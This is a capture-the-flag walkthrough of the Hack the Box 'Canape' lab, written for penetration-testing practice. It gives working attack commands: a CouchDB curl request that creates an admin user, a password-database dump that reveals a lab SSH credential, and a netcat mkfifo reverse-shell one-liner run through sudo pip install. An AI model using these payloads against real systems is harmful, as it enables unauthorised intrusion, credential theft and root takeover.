Hack the Box Challenge: Canape Walkthrough
Hello friends!! Today we are going to solve another CTF challenge “Canape” which is available online for those who want to increase their skill in penetration testing and black box testing. Canape is retired vulnerable lab presented by Hack the Box for making online penetration practices according to your experience level; they have the collection of vulnerable labs as challenges from beginners to Expert level.
Level: Intermediate
Task: find user.txt and root.txt file on victim’s machine.
Since these labs are online available therefore they have static IP and IP of Canape is 10.10.10.70 so let’s begin with nmap port enumeration.
1 | nmap -p- -sV 10.10.10.70 |
From given below image, you can observe we found port 80 and 65535 are open on target system.
As port 80 is running http server, we open the target machine’s IP address in our browser and find that it is a fan site for the Simpsons.
We don’t find anything on the webpage, so we run dirb scan to enumerate the directories. The target machine responded with 200 OK for every request but for the /.git/Head directory the size of the response changed.
1 | dirb http://10.10.10.70 -f |
We open the /.git/ directory and find the config file.
When we open the config file, we find a domain name “git.canape.htb”.
Now we have added the domain name of the target machine in /etc/hosts file to access the webpage using IP address as well as domain name.
Now we can clone the local git repository using the following command:
1 | git clone http://git.canape.htb/simpsons.git |
Here we found out a file named “__init__.py” in Simpsons folder as shown in the image.
After download the files, we open “__init__.py” and find that this program might be vulnerable insecure deserialization as it uses a vulnerable function “cPickel.loads(data)”.
Now we create a program to exploit this vulnerability and get reverse shell. You can download the exploit from here.
We setup our listener “netcat” before running the program and run the following command:
1 | nc -lvp 443 |
After getting reverse shell, we start penetrating more and more. We check for the open ports in the target machine that might be listening locally and find that a service is running on port 5984 for the Apache couchDB.
1 | netstat -antp |
Apache couchDB is an open source database software. We check the version of couchDB and also find all the databases using the following command:
1 2 | curl http://127.0.0.1:5984 curl http://127.0.0.1:5984/_all_dbs |
Using the above command, we find the version of couchDB to be “2.0.0”. This version of couchDB is vulnerable to remote privilege escalation. You can find more about this vulnerability here.
Then we create a user with permissions to read the database with following command.
1 | curl -X PUT 'http://localhost:5984/_users/org.couchDB.user:hack' --data-binary '{ "type": "user", "name": "hack", "roles": ["_admin"], "roles": [], "password": "password" }’ |
We then dump the database with the following command:
1 | curl http://127.0.0.1:5984/passwords/_all_docs?include_docs=true -u hack:password |
The above command will dump the password and we will find the password for SSH login. Now all we need to do is find the username.
We open /etc/passwd to find users available on the target machine. We find that there is only one proper user called homer.
1 | cat /etc/passwd |
We login through SSH using the credentials we found earlier “homer:0B4jyA0xtytZi7esBNGp”. After login we find a file ‘user.txt’. We open the file and find our first flag.
After getting the flag, we checked the sudoers list and find homer has permission to run “pip install *” as root user.
1 2 3 4 | ssh homer@10.10.10.70 -p65535 ls cat user.txt sudo -l |
Now as we know we can run “pip install *” as root, we are going to abuse it by creating a reverse shell and saving it as “setup.py”.
We are going to use netcat pipe one liner to get reverse shell.
1 | rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.4 4444 >/tmp/f |
Now we can run our reverse shell using the following command:
1 | sudo pip install . |
Remember to setup the listener before running the above command.
As soon as we run our command, we get our reverse shell as root user. We now move to /root directory and to get “root.txt”. We take a look at the content of the file and find our final flag.
1 2 3 4 5 | nc -lvp 4444 id cd /root ls cat root.txt |
Author: Sayantan Bera is a technical writer at hacking articles and cyber security enthusiast. Contact Here
Source: www.hackingarticles.in